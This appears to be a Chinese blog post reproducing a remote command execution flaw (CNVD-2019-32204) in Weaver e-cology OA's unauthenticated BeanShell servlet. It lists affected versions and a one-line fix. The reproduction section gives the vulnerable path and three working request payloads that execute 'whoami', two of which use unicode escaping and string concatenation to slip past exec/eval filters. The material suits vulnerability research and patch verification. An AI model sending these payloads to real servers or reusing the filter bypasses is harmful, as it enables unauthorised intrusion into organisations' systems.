泛微OA 多版本存在命令执行
参考
https://blog.csdn.net/qq_41770175/article/details/102821349
https://www.linktrust.net/oday/471.html
https://www.freebuf.com/vuls/215218.html
漏洞描述
泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行
CNVD编号
CNVD-2019-32204
影响版本
e-cology <=9.0
漏洞修复
屏蔽/weaver/*目录的访问
漏洞复现
1.漏洞路径:/weaver/bsh.servlet.BshServlet
2.
把print(“hello!”)换成exec(“whoami”),就可以测试能否执行系统命令了。
Poc1:bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw
如果有全局过滤器过滤了exec或eval,会有报错,
可以采用unicode编码、字符串拼接等方式绕过,见下图:
Poc2: bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw
-----------------------------
Poc3:
bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(\”command\”))”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
最新文章
- eclipse svn分支与合并操作
- Java 串口通信
- Cocoapods的安装
- Spring中的JDBCTemplate
- 获取指定版本号svn
- 利用Hadoop实现超大矩阵相乘之我见(二)
- CSS基础要点概况
- C++函数传值调用
- Error 56: The Cisco Systems, Inc. VPN Service has not been started(Cisco VPN在Vista下出现Error 56的解决办法)
- php操作xml并插入到数据库中
- Android View框架总结(四)View布局流程之Measure
- 2、Storm中的一些概念理解
- OneNote无法打开链接出现错误:你的组织策略阻止我们为你完成此操作
- 详解angular2组件中的变化检测机制(对比angular1的脏检测)
- vue-02-安装-指令
- delphi 获取webbrowser的cookies给Idhttp用
- 2019 wannafly winter camp day 3
- linux下如何解除被占用的端口号
- Building Apache Thrift on CentOS 6.5
- Java之集合(一)接口及抽象类
热门文章
- SpringSecurity简单使用
- SpringBoot 中使用 Swagger2 出现 whitelabel page error 解决方法
- l2-002 链表去重 (未解决)
- 基于用户的协同过滤的电影推荐算法(tensorflow)
- React vs Vue in 2020
- gitpod &; free online ide
- js &; bitwise operator
- js &; for &; for of &; for in &; forEach, break
- git merge all in one
- k8s部署mysql数据持久化